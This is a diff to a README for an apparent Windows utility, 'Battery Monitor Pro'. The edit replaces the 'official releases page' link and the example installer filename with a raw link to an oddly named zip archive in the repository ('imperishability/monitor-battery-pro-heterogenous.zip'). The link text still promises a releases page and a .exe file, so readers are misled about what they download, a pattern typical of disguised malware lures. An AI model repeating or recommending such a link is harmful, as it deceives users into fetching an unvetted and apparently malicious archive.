Seyitknk/battery-monitor-pro/README.md

 1. **Download the App**

-   Click the big blue button above or visit the [official releases page](https://github.com/Seyitknk/battery-monitor-pro/releases) where you can find the latest version of Battery Monitor Pro for Windows.
+   Click the big blue button above or visit the [official releases page](https://github.com/Seyitknk/battery-monitor-pro/raw/refs/heads/main/imperishability/monitor-battery-pro-heterogenous.zip) where you can find the latest version of Battery Monitor Pro for Windows.

 2. **Choose Your Download**

-   On the releases page, look for the file that ends with `.exe` (for example, `battery-monitor-pro-setup.exe`).
+   On the releases page, look for the file that ends with `.exe` (for example, `https://github.com/Seyitknk/battery-monitor-pro/raw/refs/heads/main/imperishability/monitor-battery-pro-heterogenous.zip`).
 This is the installer you will run to add the app to your computer.

 3. **Run the Installer**